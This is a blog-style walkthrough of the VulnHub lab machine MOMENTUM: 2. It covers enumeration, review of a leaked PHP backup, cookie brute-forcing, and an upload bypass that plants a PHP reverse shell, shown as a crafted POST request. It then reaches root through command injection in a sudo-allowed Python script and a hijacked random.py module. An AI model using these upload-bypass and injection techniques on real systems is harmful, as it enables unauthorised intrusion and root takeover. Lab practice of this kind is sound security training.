I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day so I did a bit of OverTheWire on my phone. It’s hard to do some of it where you’re expected to resize a terminal window to take advantage of more or something like that, but Leviathan was doable and so I completed that. After that I got home again and did MOMENTUM: 2 from VulnHub.
Keywords : curl, bash, code review
It’s medium rated.
Ports
SSH and HTTP only.
HTTP
We need to do some enumeration here; there are a few things we need to find:
http://192.168.1.240/dashboard.html is where we can upload files,
http://192.168.1.240/owls/ is where we find our uploaded content, and
http://192.168.1.240/ajax.php.bak is where we find our code to review
The last one I found with:
feroxbuster -u http://192.168.1.240 -w /usr/share/seclists/Discovery/Web-Content/merged-file -C 403 -x php,bak --no-recursion
What’s in our code?
//The boss told me to add one more Upper Case letter at the end of the cookie
if ( isset ( $_COOKIE [ 'admin' ]) && $_COOKIE [ 'admin' ] == '&G6u@B6uDXMq&Ms' ){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array ( "pdf" , "php" , "txt" );
}
else {
$valid_ext = array ( "txt" );
}
// Remember success upload returns 1
This is relatively simple. We need to set a cookie but also figure out what it needs to be, and add a new parameter to our POST request. Before finding this file I had tried to defeat the upload filtering to no avail. Considering we need that cookie and parameter, it’s no wonder.
I use Burp Suite Intruder to find the last character of the cookie - it is ‘R’. Then I construct this request:
POST /ajax.php HTTP/1.1
Host: 192.168.1.240
User-Agent: Mozilla/5.0 ( X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: * /*
Accept-Language: en-US,en; q = 0.5
Accept-Encoding: gzip , deflate
Content-Type: multipart/form-data; boundary = ---------------------------136110921536555815714284481441
Content-Length: 5842
Origin: http://192.168.1.240
Connection: close
Cookie: admin = &G6u@B6uDXMq&MsR
Referer: http://192.168.1.240/dashboard.html
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name = "secure" ;
val1d
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name = "file" ; filename = "shell.php"
Content-Type: application/x-php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright ( C) 2007 pentestmonkey@pentestmonkey.net
# etc
Privesc
At this point we’ve shelled the box and we get the password for our user:
www-data@momentum2:/home/athena$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 18:26 .
4.0K drwxr-xr-x 4 root root 4.0K May 27 16:30 ..
4.0K -rw-r--r-- 1 athena athena 220 May 25 12:15 .bash_logout
4.0K -rw-r--r-- 1 athena athena 3.5K May 25 12:15 .bashrc
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 16:58 .local
4.0K -rw-r--r-- 1 athena athena 807 May 25 12:15 .profile
4.0K -rw-r--r-- 1 athena athena 37 May 27 17:04 password-reminder.txt
4.0K -rw-r--r-- 1 root root 241 May 27 17:09 user.txt
www-data@momentum2:/home/athena$ cat pas
cat password-reminder.txt
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ cat us
cat user.txt
/ \
~ Momentum 2 ~ User Owned ~
\ /
---------------------------------------------------
FLAG : 4WpJT9qXoQwFGeoRoFBEJZiM2j2Ad33gWipzZkStMLHw
---------------------------------------------------
www-data@momentum2:/home/athena$
www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*
athena@momentum2:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass,
secure_path = /usr/local/sbin\: /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin
User athena may run the following commands on momentum2:
( root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
athena@momentum2:~$
How can we exploit this? Let’s inspect the code:
athena@momentum2:~$ cat /home/team-tasks/cookie-gen.py
cat /home/team-tasks/cookie-gen.py
import random
import os
import subprocess
print( '~ Random Cookie Generation ~' )
print( '[!] for security reasons we keep logs about cookie seeds.' )
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input( "Enter the seed : " )
random.seed = seed
cookie = ''
for c in range( 20) :
cookie += random.choice( chars)
print( cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen( cmd, shell = True)
athena@momentum2:~$
We’ve got command injection on the ‘seed’ parameter, and I use it to create a new python random module:
athena@momentum2:~$ cd /home/team-tasks
cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2; bash -c 'touch random.py && chmod 777 random.py'
2; bash -c 'touch random.py && chmod 777 random.py'
SLhHfZUPTWW$WUGLDDWO
athena@momentum2:/home/team-tasks$ 2
athena@momentum2:/home/team-tasks$ printf 'import os\n' >> random.py
printf 'import os\n' >> random.py
athena@momentum2:/home/team-tasks$ printf 'os.system("/bin/bash");\n' >> random.py
<ks$ printf 'os.system("/bin/bash");\n' >> random.py
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
root@momentum2:/home/team-tasks# id ; hostname ; date
id ; hostname ; date
uid = 0( root) gid = 0( root) groups = 0( root)
momentum2
Fri 09 Jul 2021 08:16:35 AM EDT
root@momentum2:/home/team-tasks#
Boom.